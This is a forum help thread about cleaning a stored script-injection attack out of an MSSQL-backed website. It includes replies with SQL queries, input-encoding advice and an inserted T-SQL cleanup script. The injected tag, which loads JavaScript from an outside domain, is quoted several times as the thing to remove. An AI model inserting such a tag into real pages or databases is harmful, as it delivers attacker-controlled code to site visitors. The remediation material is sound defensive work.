• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 454

Need to remove an 'unauthorized' script from database fields - help/suggestions

Here's the deal, some jerk-offs infiltrated my website database with this:

<script src=http://www.clsidw.com/b.js></script>

They were able to insert this into some of the fields in my database, and my most recent backup was done after they did it, so I can't go back. Now, I need to get into the database and erase this entry in whatever fields they got into.

1 What is the fastest way to accomplish this?

2 What database software should I use keeping in mind I probably will never use it again, so cost IS a consideration.

3 Is there a way to clear this automatically or in a batch?

FWIW, they DID NOT overwrite the fields, they simply ADDED this to them.
0
bishopandsix
Asked:
1 Solution
 
Tomas Helgi JohannssonCommented:
Hi!

Have you tried Toad for MySQL (www.toadsoft.com)?
It's free and a very good DBA tool for making changes to your database.

What you can do is do an update on each table and put an empty string instead of the script string for fields that are
just chars / varchars.
With text fields (TEXT, MEDIUMTEXT, LONGTEXT) or BLOB fields it might be a little trickier.
What you can do is use mysqldump to dump the database(s) to an sql file and use
a text editor (like WordPad/Notepad if you use Windows) to search and replace the script text with blanks
and then restore the database with the altered backup sql file.
See the manual for further info:
http://dev.mysql.com/doc/refman/5.0/en/mysqldump.html

Regards,
   Tomas Helgi
0
 
ZippitCommented:
this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'


0
 
bishopandsixAuthor Commented:
I'm sorry, I think my Database is MS SQL, does Toad work with that? I am a complete beginner when it comes to database stuff.
0

 
ZippitCommented:
If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)
0
 
bishopandsixAuthor Commented:
"this is a pretty standard attack against websites that allow HTML embedded into their comments.  If it's in comments and you don't mind just blowing away the offending comment (not other comments, just the one with the offending html in it), then something like the following will work (run this in a query tool):

DELETE FROM tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'"

If I do this, will it eliminate ONLY the added script, or will it eliminate everything in the field? Also, what software should I use to do this with?
0
 
bishopandsixAuthor Commented:
"If you are running ASP or ASP.NET it would be a good idea to HTMLEncode all user submitted input.  This will prevent this attack from working in the future.  Use a line like the following to do so:


userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly?
0
 
ZippitCommented:
The delete will delete all data in the entire affected record.  If the malicious script tag is in a comment you probably want to do that anyway.  If you just want to remove the "script" tag then you are going to need to write a program/script to loop through all your records and update the field with the value with the malicious script tag removed.

If you want to see what records will be deleted run the following:

SELECT *
FROM  tbl_myComment_Table
WHERE str_text_field like '%http://www.clsidw.com/b.js%'

You will need a query tool to run this against.  If you are using MSSQL then use either Query Analyzer or SQL Server Management Studio (they come with SQL Server Standard or Enterprise).
0
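As an added example (not code from this thread), here is the "program/script" Zippit mentions, written as T-SQL so it runs in Query Analyzer or Management Studio: it walks every string column of every table in the MSSQL database, reports which ones contain the injected tag, and, once @apply is set to 1, strips only that tag from the matching rows, leaving the rest of each field intact (including the TEXT columns Tomas called trickier). It assumes SQL Server 2005 or later and that the tag is stored exactly as quoted in the question.

```sql
-- Constructed example. Adjust @marker if the report pass shows variants
-- (quotes, extra whitespace). A marker containing %, _ or [ would need
-- LIKE escaping; this one contains none of them.
DECLARE @marker nvarchar(200), @apply bit;
SET @marker = N'<script src=http://www.clsidw.com/b.js></script>';
SET @apply  = 0;   -- 0 = report only, 1 = strip the tag in place

DECLARE @schema sysname, @table sysname, @column sysname,
        @col nvarchar(300), @sql nvarchar(max);

-- Every string column of every base table (views are skipped).
DECLARE cols CURSOR LOCAL FAST_FORWARD FOR
  SELECT c.TABLE_SCHEMA, c.TABLE_NAME, c.COLUMN_NAME
  FROM INFORMATION_SCHEMA.COLUMNS c
  JOIN INFORMATION_SCHEMA.TABLES t
    ON t.TABLE_SCHEMA = c.TABLE_SCHEMA AND t.TABLE_NAME = c.TABLE_NAME
  WHERE t.TABLE_TYPE = 'BASE TABLE'
    AND c.DATA_TYPE IN ('char','varchar','nchar','nvarchar','text','ntext');
OPEN cols;
FETCH NEXT FROM cols INTO @schema, @table, @column;
WHILE @@FETCH_STATUS = 0
BEGIN
  -- TEXT/NTEXT cannot be passed to REPLACE or compared directly,
  -- so every column is read through CAST(... AS nvarchar(max)).
  SET @col = N'CAST(' + QUOTENAME(@column) + N' AS nvarchar(max))';
  IF @apply = 0
    -- Report pass: count rows in this column that contain the marker.
    SET @sql = N'SELECT ''' + @schema + N'.' + @table + N'.' + @column
             + N''' AS location, COUNT(*) AS hits FROM '
             + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' WHERE ' + @col + N' LIKE ''%'' + @m + ''%'' HAVING COUNT(*) > 0'
  ELSE
    -- Strip pass: remove only the marker; the rest of the field stays.
    SET @sql = N'UPDATE ' + QUOTENAME(@schema) + N'.' + QUOTENAME(@table)
             + N' SET ' + QUOTENAME(@column) + N' = REPLACE(' + @col + N', @m, N'''')'
             + N' WHERE ' + @col + N' LIKE ''%'' + @m + ''%''';
  EXEC sp_executesql @sql, N'@m nvarchar(200)', @m = @marker;
  FETCH NEXT FROM cols INTO @schema, @table, @column;
END
CLOSE cols; DEALLOCATE cols;
```

Run it with @apply = 0 first and take a fresh backup before flipping it to 1; to rehearse the strip, wrap the script in BEGIN TRAN ... ROLLBACK and compare the hit counts before committing for real.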
 
ZippitCommented:

userInput = Server.HtmlEncode(userInput)"

If I do this, will it still allow me to use HTML in some of my fields? What does this function do exactly.

"YOU" can as the administrator.  But if you put that code in your comments submission code (or wherever the user's submitted the malicious script tags) then they will no longer be able to use HTML of any kind.

If you want them to be able to continue using HTML then you will have to write a "smart" filter that strips out possibly malicious tags like <script>.  But that's easier said than done.
0
 
bishopandsixAuthor Commented:
Still need some help with what software to use to accomplish the database cleaning. The database is MSSQL as far as I know.
0
 
ZippitCommented:
What product are you using for your site?  If it's open source I will take a look for the schema and might be able to whip something up real quick.

Is the site hosted on your server or are you renting server space/web space?
0
 
bishopandsixAuthor Commented:
Absolutely no idea what product. I'll get with my host in the morning and ask.
0
 
bishopandsixAuthor Commented:
Thanks, your help got me going in the right direction and I was able to clean the records with only a slight amount of additional info I found by doing some Google searches.
0
